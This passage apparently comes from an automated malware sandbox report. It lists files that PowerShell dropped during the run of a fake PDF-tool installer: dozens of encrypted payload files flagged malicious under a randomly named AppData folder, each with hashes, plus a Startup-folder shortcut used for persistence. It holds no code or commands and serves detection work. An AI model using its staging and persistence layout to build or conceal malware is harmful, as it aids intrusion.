                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171320
                                                                                                    Entropy (8bit):7.999055455968372
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:lVWAKwc4z0G00O17NpWdnsm52Tx1/fcWd8CcTwkCaXTVq0+4ec/zPwyCh45F3dc:lVWAZO/17NURsNL3cM8KNaDVq0rwyw4K
                                                                                                    MD5:4D1D2222CBC50DCB29078D526C7487B0
                                                                                                    SHA1:D618378F192683839EC85811E74821638C332725
                                                                                                    SHA-256:0DDFAAF279037C03E05C13F8C88F16E14A82AF612322E8144BCD8E895987B8B7
                                                                                                    SHA-512:C9982485B4F90DE4CFD32F768CBEAE26A4DA52E92072B2838F5435069A71202EF91F9C1FC2CEFE86A99FF33C97709C040CF7B383B3D483913879DA1B43384B5F
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vWrcOxIVHuZie.sAUdchJQICyYnHRN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158001
                                                                                                    Entropy (8bit):7.998788329059919
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:bltdb6Ef4hDeAaXFXWD0Z/SblBZQyX6Gu9mA+OH6pg/ZpV5hCCoFNY2Dhb:Ey49eX20Z/aTZQ5M1eRphKjPhb
                                                                                                    MD5:8FA3E7629774EC0D2AE2972B0EB0654C
                                                                                                    SHA1:B1701D69C23FC90810E34EFCBB60FA324A2EF955
                                                                                                    SHA-256:D62CB50DEE3A9EB386BB7ECED0AB1B6BF5F8FC72A83D47C187CB24202EAF6DAE
                                                                                                    SHA-512:C9F5B4509A4EC7CE9C281F8D517857BAE6E25C565F3A2F97A2EE70296D94A0A13F5249C237541F32CB51A26DE076AF25C5459EDAA9EEE3584662040CFD451375
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\wrENkOBQTIilo.CmlqrIDdfswgS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57822
                                                                                                    Entropy (8bit):7.9969507804442035
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:SuZy5KIixmkSmaiL2B0tghHS89I0O9R4YppFuQS:Smy5KI11maiLv+YVp2
                                                                                                    MD5:D3F135041445B0291395776E21860A09
                                                                                                    SHA1:02F9109EFF1A7B2054F24D695B345602F7A0C185
                                                                                                    SHA-256:CA76109478A10DEB3F97F1E1128DBA7FA69F4A4005EED730404DD5D2E649D3C0
                                                                                                    SHA-512:08660F3FB675DE083D8367239615D0BC65A1B5299EB4E6BC98B682129323617484EB0554E18463A5AAAA24C044B26DC1ACB37A4DC3D2C81B139426B7EEB93445
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xASXwpkHaBguhUI.piQYzfyXZSBjntbV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):133481
                                                                                                    Entropy (8bit):7.998819062418321
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:y7vbGZvranKhMXsK6cBnFECjKy/GQYi9qjXVL3TKAbakGVluha:caZWKhMXsK6mFFjKyOW4Xl9Fylu0
                                                                                                    MD5:CED05DE27281F64CDF7604C290795A38
                                                                                                    SHA1:5891AAB66D82F36FDBD2DD0002DEE83216BE7C30
                                                                                                    SHA-256:09AD133080A1063316EE45D06793FED7A84888DDFD324955041F989CFF2F4741
                                                                                                    SHA-512:8D67D81542154D753FBDDCD53F74C83495D974D18CF1B0A2DD4CBD78ECB6A74F01B9BA6996D45D49A782FD946ED1E6848F172D21D22CAB41CB71C2754791786C
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xUfXtzWvinO.cgBHhwNMiYqJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):130102
                                                                                                    Entropy (8bit):7.998509602720836
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:uEFPxYEEikAgr6xussei647PZUg/a65s5XM1svfx:uEVDg8uqixC0avfx
                                                                                                    MD5:549B5888CAC323ABFA07F7CB003F44A9
                                                                                                    SHA1:BC9C0610BD4C1C88BDD06683BAAB0F7E41B01111
                                                                                                    SHA-256:3E784468FC475420D9ECCCF7086FE75A726773ADB7AE9FC62EFFC8B23B6C6011
                                                                                                    SHA-512:1264BC8CF1FE58D383700CE314FC4A1AEF433FFE9DEF880D237A7904B2A292EC1B0D92CA96C28AACE1F96E51B6801592019DD682D907E7292D8D78BA8D29E0FB
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xXeNBRagpncOPSMt.TDpsAaYbwMldcU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55330
                                                                                                    Entropy (8bit):7.996343733133309
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:baMJjgi5n+Rbvp2nt5mc1GnBRcgOMwQmNagcYY+MaA1m:WMRz21m5D8BSg1wHVS+Mnm
                                                                                                    MD5:F55A6B6492EE351B59FD040C92FDBF57
                                                                                                    SHA1:7A1D5A2EA8F2C1EFF04FED10E79434F8560C77B3
                                                                                                    SHA-256:B51C9437850543A747B9A00570F51EA0F925812BC4947A9D56445C6B782FDBD9
                                                                                                    SHA-512:8B2E1BCBCB2C5B5776238B3B8FC88D24EF26A3012FBA493742EB49701233CD628490D541DA46E412595443EB83633F80B4FDF345E361941710C226A55717BE2B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xZriAtTWvpMqs.XszfobHxFKjBGr
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):150329
                                                                                                    Entropy (8bit):7.99865516317756
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:n1BfbB0/Ip5p26/jwnlO1WeaSBoXcR8ar1oDoa4FAGEsQzc:XiKfklOojIoXYqD4E0
                                                                                                    MD5:4424A12B2E12F67B966DEFEC77E912AD
                                                                                                    SHA1:D138063AC812653B5CD7AF0111A081545C6A1FD0
                                                                                                    SHA-256:7350F1B3834984C31A41EC06CEDBB29B5DE9089CDCD4798D76CA542CB96AF5FE
                                                                                                    SHA-512:694B75EC0B035AC47773CE98669838D75451D4CDDDF33DEC2F187882AFDD62A43F6B2047C7E2BBF03DDC83ADFDC6EB664F9BC82F8BFDB3A3E702B4516AA7C15B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xguzsFEnXCV.eloCDkLIGYfQux
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77765
                                                                                                    Entropy (8bit):7.997638569107241
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HFZpt3p5cTzWILfe8wXm2jnfFmcaL81KG1BbnXxoBLmg1JsHF:lZp/5cfWifeDDjnfFVa41KG1BTK9hsl
                                                                                                    MD5:A744C2B8B8CF501E1E3F93618DD604B3
                                                                                                    SHA1:2A09C7FB444F40EBDD9D9C898EA59625517E4E21
                                                                                                    SHA-256:30B9B4511EE774F3600E569EBBE0CBAF40DAA0F6199496C5273C5E7BB759127B
                                                                                                    SHA-512:8888690DC209B3ECD43838582DCC92C633DA53B52D03BF7A46B0FFCD960F918EF37A5C8FAEDF4BB07F0FDF2ECFBBA99DBBAD53EE2E36A143AEFB705026EF0833
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xioUVAHDRBaSQOhqrEe.GJAgmouSfxi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53633
                                                                                                    Entropy (8bit):7.996920815619546
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:/9oVEWV3InPoHIfOVF8q/7/0vZKxaJVv+Amr6BDimRIlVN5Xtxak00BCPmnkK:/IV3+3Pq/7sRQYgt6VimRutxak00BpT
                                                                                                    MD5:B0ECD45F8DCD8BD009A4A7DF4B5BFD29
                                                                                                    SHA1:4CB9B76FC79FAF62866029F1786131405AD1A373
                                                                                                    SHA-256:D0FC44CECDC0F13965A7DBE3DDB7B20B07AB351A537BB3C4CE8171E3D89CCA11
                                                                                                    SHA-512:47A60EC4D5C52295D468D0784E3A59AFD2F332B24537E952050E6040067E5CFDC451098CA8096B92B48883EC5B546D38145F58A6E2E55C6438EB6DD3D40B3610
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xlJMWToIZkXsRyB.ayIRtvqOPVj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195664
                                                                                                    Entropy (8bit):7.999070958536488
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:+xyjp7HUnXqL3rgGvIHj5gFQoinc+ubOysQnBcYuV8220H7wJTNRkDy5Iv1gEcO:+xyj2ONa5UQoinc+unnIO0H7wJhRkT1P
                                                                                                    MD5:0BF5C267D627BB0E2C77BB9137EE5414
                                                                                                    SHA1:8BC6AA8F20F138D254CCA9407F3FECEA027A6DFE
                                                                                                    SHA-256:24321ECC18A2F5470EFF0FF618C0C2EBB637B7926E253B6A0E8D378B5975EB53
                                                                                                    SHA-512:242276EA0658A18087FD46B7B4CAB176B06CB3F8076F41C8BA8E13BC4646BE4B07CFC5216DF7A85DF51EF07D6651AA1720CFB861DF9D0DFAF2BDD04725E6CD79
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xqZFGPobdYlzRJrhm.TaMrvmsbdLucUY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102953
                                                                                                    Entropy (8bit):7.99817739929451
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Zag49DhGU5T40GpPFYTJCHuGhjChdHXsTnAkM:ZKhfGLYnAuoAkM
                                                                                                    MD5:C707B925C1170237928CA86EDD251678
                                                                                                    SHA1:B1CB675C99DA11403864BABC51783020D6605E82
                                                                                                    SHA-256:250BB89E38FF06122411869D60007376AA15355F17489DCABD7E8B982385CE19
                                                                                                    SHA-512:561165DDC76ED39B9D0E00D090C4FA6888FB94D340BA310555D522F7010FBA4A1DE63F9E35E6447F853519213D41D17E0D51EBF51F9A84E18920A367F2F4EBBD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yApgcBWNRek.hNoCKMdHIFbWsV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74586
                                                                                                    Entropy (8bit):7.997754347011361
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:CffTWjXUy2aVjnX0N4SlHAuIG13I0vpIghV6AF6A0OtkN:YKjk0VTkNXgsDI4FjkN
                                                                                                    MD5:C52E881499584643081F5912B2001C3E
                                                                                                    SHA1:2D3EEDA306A46622178F597EA8522AE1BE41DE39
                                                                                                    SHA-256:877D401028A72B1EDE2DF81B9477AD9BD4D406892E14F005E45B06B6C1A1946B
                                                                                                    SHA-512:780A15C254048ADEEB0CA7A0D78758818B9F49DC45CCF1C9708F7CF222ED81031242B32194EB5FC047C50ED6F03913B3CA6844310A4CB1C60B59D7056EFE795B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yBdqUfkusbIrSNG.CTnqNUAEuJYpGLaF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128795
                                                                                                    Entropy (8bit):7.9986596701099755
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CIeu/3v94Fx3zPBzoe4S7GUqdLXso/SoRKJX2X41WX:t5316x3FzvUl8oqWX
                                                                                                    MD5:29D1D16F0B464892C8A713040E51B7F8
                                                                                                    SHA1:99502AFDFB15BE83C86B9ABD384DC51D5F8E4913
                                                                                                    SHA-256:71CA8A4C7B35F7E19AC9AC433A84A3E45FD7BE661E56EDA644F3D43938F4176B
                                                                                                    SHA-512:D7739100D0FE1D846E54633DF2604599E6C2D35C56121A1CA8BE554018692A0BC715E86EA8E9520B8F0223264EECE0960580870DE1567D1511992A8D1F1E8A7B
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKhcmtGOVHQz.kGhaLzHnKDUvPTgdRm
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:locale data table
                                                                                                    Category:dropped
                                                                                                    Size (bytes):57380
                                                                                                    Entropy (8bit):7.997113893681033
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:4J7Kt8YbFwlGb1ItuVK0TMh1Dvdun3cNHZt0i/xqQei:YYjFoGJguVhTMhw3gHZSi/xp
                                                                                                    MD5:1BAA26CED5C598BF2CAA35E75541F9A2
                                                                                                    SHA1:BC0F5F238C02A25BFE918C70BA8C502DE28F7BA3
                                                                                                    SHA-256:BAB2768E2BB46203617D4982E99B367C7F1E7F8D115409321D99EB18A069E658
                                                                                                    SHA-512:ECAEAACF1E41B74039619C009BF4763EA55EB6C9119C8DF6EB12889D053655557A26EAA060E668FB490E1BC3E91106891B268E70BC3FA3946225AFC3E3A66E17
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKiaAdGskN.bePNkQSFozIpEahHcy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170491
                                                                                                    Entropy (8bit):7.9988960366295725
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:KF9m3qOEbPQ73VgS/VZ16k6OrEbI2B9QNvNR1hvpnavfqLPG5:4mAQnIZlbH9ivNR1hMAe5
                                                                                                    MD5:260BB1BC5168F4D5448DBF05246FCD52
                                                                                                    SHA1:E2CB547195F6FD87E78F402838423BF5302D7570
                                                                                                    SHA-256:3948AFAB57916717111B6755330C531A364AC6367F406C43A462B8F41D4833A9
                                                                                                    SHA-512:06C60BBED8EADEEE108C45A395308FF211274AF957F5C809D8818B53ADBC977BFB82F8456998FDC4081E6F7A9FC16DBCBE5FA56B6DBEBBD86ECB34C1DAE1D369
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yTajVxHXOlBhwGgd.gzUDAbLthKqwlI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66960
                                                                                                    Entropy (8bit):7.997149160909514
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ojeiA4hVHHTPCFL9TZD3r8nJDLUOO2+i5pOojmZT24fp:ox7HHselJOs5YR524x
                                                                                                    MD5:1A35BF59554557D2F6AA6DF64DE9848A
                                                                                                    SHA1:31BCC1826AAA37D3ED11D4B41EE1167A0726B22A
                                                                                                    SHA-256:E397F9AA1D9F97C60AFB0E816503639D4DCF11E1125F7E2503323E9160A21F3B
                                                                                                    SHA-512:35F01E86228B39100B48A8C2723EDD2E587A47606C480604E3ABA86C09A9BF10498FB2E7C3D7353E005F383F8F17116423AC7E70EEFFC334957B9741210C0582
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yXGQHJUTtaZwDsgPK.etYhpLgwsBPzWIdG
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65275
                                                                                                    Entropy (8bit):7.997127414806795
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:uvshhFPxDAllyEiOtZZMUDrzHf+xus+tU:uEFPxYEEikAgr6xussU
                                                                                                    MD5:1161EF9E6F6FDC356251320963BC72A2
                                                                                                    SHA1:644CEC990E7F16AAB92978DABE5236C7524D0EDF
                                                                                                    SHA-256:18C7829BD68148675B07D502D6A5171EC4889ADDD1A9A16D1B869B0ECB778BE9
                                                                                                    SHA-512:B527FA7B0A701F995BD551E81E04E19913DB890180C2AABFD3632B42A35DCE60456735C2055C4A7A4C377DFF871DABC573C38A1D8581D3C50290150232D01F17
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yicVjkbxqXsEHlhOp.FHXvtRKNqugc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116926
                                                                                                    Entropy (8bit):7.998366391264243
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:mJhHLfPi/aOeO7kUlHYICP59OYehtqhYGGWJf0v2e5:YhrPi/7erXkhgGO7e5
                                                                                                    MD5:5C635BF6F76DC2A3E2007DC8B37E1231
                                                                                                    SHA1:E54CE7E6752B943E6DDA0F1E51E1C9019BDBB68A
                                                                                                    SHA-256:30593CEBF755D0B857B5E0B59D1B9C3525E0123EEC8650E2DFBE5F58263D59E6
                                                                                                    SHA-512:BDB98AEF2F334B302836E9CED216D1482F7687DFCEB83A83723DD30F91AADCF5BB1E464489A4EE953108813D30EC672B9807D5E519308C4C159BF32206C5C674
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yxzIOePqZgWV.FZvxrjuBcshmCQiXz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):59708
                                                                                                    Entropy (8bit):7.997174498844205
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:768:hWZXdLi7BX2eusXldUw7OxGJSAJwx6YyxFVHtiAuwl/EkVe0JVTgbplMwdejngXz:8bkBJuq/Uw7OeSOYy5tizb03fwdcgXtN
                                                                                                    MD5:113F890282218F733F6FA589785FADE0
                                                                                                    SHA1:78844A416CA41178CFD8749085B5E5E43A7A2BA7
                                                                                                    SHA-256:94FE6D8A47E47BE40112CF32AAB202172695396FC816DDD4261C53027F2D29E8
                                                                                                    SHA-512:B210B67F596A8E0FB94EDD2A037DF073F50E6D349873A9DFA1E495A9FCB00EBAA651F2F2A293DEEE6E2FB00DBC43F69DA7BA8BA04A4A1C601AD90142B055E76D
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zHIyjvMFtdYk.geMbQnDuPof
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55066
                                                                                                    Entropy (8bit):7.996835811785206
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Lv753qaOKRsJhCUczsgbbdN7ubyxKuxISD0:LN3qPKR3UMsgbbdN7uuxKi0
                                                                                                    MD5:74ADBFC39C183D88E0F36923BBA374B9
                                                                                                    SHA1:01098B22DABBCE4D663CB563E4D9A7453D14678A
                                                                                                    SHA-256:A9E76AAA9B47B537E383AA3BC279FC7C3FE41A14EE86CD83201CD061BCDB19E8
                                                                                                    SHA-512:7E2750A802778AD903CE46A64AEC97220479B8A3D1C54960BE56EB2088032321106C8C1F050032AB1FA2B1B4D48843CD381C05D1339CF33CE779530706ED0B85
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zaZeXJPrtBkvbosUM.JUWVxkLIovmRlgibHS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139997
                                                                                                    Entropy (8bit):7.9984662063837195
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Y72EXtTQb0ln7LuN/jFi+jZQ/1NFomT1v/lKcknNpl7:Y7rXKb0978Uim/1NFomT1v9Kbl7
                                                                                                    MD5:886CE507767FC0564BC006C18EEE599E
                                                                                                    SHA1:C28DD5F5D7B3FB151BE1FAE40CBBA75C373ED9FF
                                                                                                    SHA-256:1FE803A7CC1662804B96579351DB93CD59B5C5D99B4959B7B8A505EE781FC11A
                                                                                                    SHA-512:6FCA2CE86BBA1B362466CAE9C81B0BCADEBA181610C7605EA982E521F027B469D693B0F6470FF75458AEB083E03593856BD1157606E395A7F3A720D3B75ACDE8
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88013
                                                                                                    Entropy (8bit):7.998109319834099
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:DxgbtO7/KrT+gCVwDPlQvgsRNK0BQZPOsfQ4Yd3G70zYIPoy4PI7Kt:DSbkDKXjCWDPYNK0BQZPOsfAWUJwdIS
                                                                                                    MD5:5FB5EB1C45B7C24AAA6D06B723CAB500
                                                                                                    SHA1:8BBD4DDAC96D4D45AFC2960436AB74C495677228
                                                                                                    SHA-256:0A1226E5F3F720F1B245454F00A6DF3EE9356BDA6104A26644C47A10A40A96E4
                                                                                                    SHA-512:348FFE7761447751A1B1DE2185C6DB384858BBE8BBBD4AFC496F5FD688078C025DAC862959981AC3D42DF18555ABA3908ED12CDEBF0A199DB58A645999951334
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5343
                                                                                                    Entropy (8bit):4.009664379318437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:l+36Q9lB+N0C9PpMCAlTjkuGWVyYSoc8/9SogZoaSYSoc8/9SogZoOH:5Q96N0ClpMCAlTBGWYnzHinzHD
                                                                                                    MD5:292A10B36467BD8ECC977235910445A1
                                                                                                    SHA1:AC501553C6E084E981A4CB020496A795FFB64F18
                                                                                                    SHA-256:332EAD334D70B567BB0D0954B0CC105E5DE85D999196778373EF403B4E770072
                                                                                                    SHA-512:76591A31E546723814A41CF1BA756380AD685F57A20794847300632586158D56D5A7FCFABDB912CBF6EC7286853EA7355576FCC85F03DE45F513F6B81004C7A3
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6205
                                                                                                    Entropy (8bit):3.76398341670208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:k43kdH9MiLN0C9UHyE8qjkukvhkvklCyw+yYSoc8/9SogZoaSYSoc8/9SogZoOH:k7dH9HLN0CSS/qBkvhkvCCtpnzHinzHD
                                                                                                    MD5:2045D527F20EDF49B7E17A6368F147C6
                                                                                                    SHA1:ED998E5344A216F33EBEAC57DC5C0F91A9945E50
                                                                                                    SHA-256:40E6ECDA8CBD07EED3B4F29C8A383B3345446AC83021BBB6FC563E47481FF0CD
                                                                                                    SHA-512:55E66F758E6E6C6E2956B8D0E0937BFB8892916044B2D5CA3CC8A1DEF852290BB7B39818BE8716BA2C195CCA35A5148D5FB0C971452478F60105A1B6790213DB
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K7341091CJBPB5T3JTW.temp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6205
                                                                                                    Entropy (8bit):3.76398341670208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:k43kdH9MiLN0C9UHyE8qjkukvhkvklCyw+yYSoc8/9SogZoaSYSoc8/9SogZoOH:k7dH9HLN0CSS/qBkvhkvCCtpnzHinzHD
                                                                                                    MD5:2045D527F20EDF49B7E17A6368F147C6
                                                                                                    SHA1:ED998E5344A216F33EBEAC57DC5C0F91A9945E50
                                                                                                    SHA-256:40E6ECDA8CBD07EED3B4F29C8A383B3345446AC83021BBB6FC563E47481FF0CD
                                                                                                    SHA-512:55E66F758E6E6C6E2956B8D0E0937BFB8892916044B2D5CA3CC8A1DEF852290BB7B39818BE8716BA2C195CCA35A5148D5FB0C971452478F60105A1B6790213DB
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT2R6UL37SSAGW1GLLCR.temp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5343
                                                                                                    Entropy (8bit):4.009664379318437
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:l+36Q9lB+N0C9PpMCAlTjkuGWVyYSoc8/9SogZoaSYSoc8/9SogZoOH:5Q96N0ClpMCAlTBGWYnzHinzHD
                                                                                                    MD5:292A10B36467BD8ECC977235910445A1
                                                                                                    SHA1:AC501553C6E084E981A4CB020496A795FFB64F18
                                                                                                    SHA-256:332EAD334D70B567BB0D0954B0CC105E5DE85D999196778373EF403B4E770072
                                                                                                    SHA-512:76591A31E546723814A41CF1BA756380AD685F57A20794847300632586158D56D5A7FCFABDB912CBF6EC7286853EA7355576FCC85F03DE45F513F6B81004C7A3
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aceef8ac0de486b7cbb4c345e0d7f.LNk
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Oct 4 18:28:30 2021, mtime=Mon Oct 4 18:28:30 2021, atime=Mon Oct 4 18:28:30 2021, length=54603, window=hidenormalshowminimized
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1109
                                                                                                    Entropy (8bit):5.030344345942585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8m3kodS9l41o5Xc2dThvuGwvA6muJxWGwkAlBm:8m3kcS9WiecThmGw4nuJsGwv
                                                                                                    MD5:FDA5A0ADB99405F58CC8CC4B9A681DF8
                                                                                                    SHA1:6BF090DA0FCF139E7852C7AC07979F2C4F1ABACD
                                                                                                    SHA-256:3A28884964F6A015F3AF07B960C09E78B534A6041209CDDFE30BC192B7E08725
                                                                                                    SHA-512:CE2F8C2A64789C7A1E9C41C472B60E4449D9C1902379CAF411093A8732C78A1E640E4F5F1DC5BC06AE801A8F4F5B809607399A588EEDEA169B1320B322E676E7
                                                                                                    Malicious:false
                                                                                                    Preview: L..................F.... .....0.V...ya3.V...ya3.V...K.......................b.:..DG..Yr?.D..U..k0.&...&...........-....V....SY..U.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DS{......Y....................yN|.A.p.p.D.a.t.a...B.V.1.....DS....Roaming.@.......N..DS.......Y........................R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N..DS{......Y.....................sJ.M.i.c.r.o.s.o.f.t.....`.1.....DS....UKPPOY~1..H......DS..DS.............................5}.U.k.p.P.O.Y.B.g.m.R.z.......2.K...DS.. .OHZWVT~1.SOM..v......DS..DS.............................N..O.h.z.W.V.t.Y.i.j.v.s.g.N.y.R.I.P.o...S.O.m.G.a.U.Y.i.W.F.c.L.y.T.k.......................-...................W........C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OhzWVtYijvsgNyRIPo.SOmGaUYiWFcLyTk..:.....\.....\.....\.....\.U.k.p.P.O.Y.B.g.m.R.z.\.O.h.z.W.V.t.Y.i.j.v.s.g.N.y.R.I.P.o...S.O.m.G.a.U.Y.i.W.F.c.L.y.T.k.`.......X.......377142...........!a..%.H.VZAj...............
                                                                                                    C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    Process:C:\Windows\System32\msiexec.exe
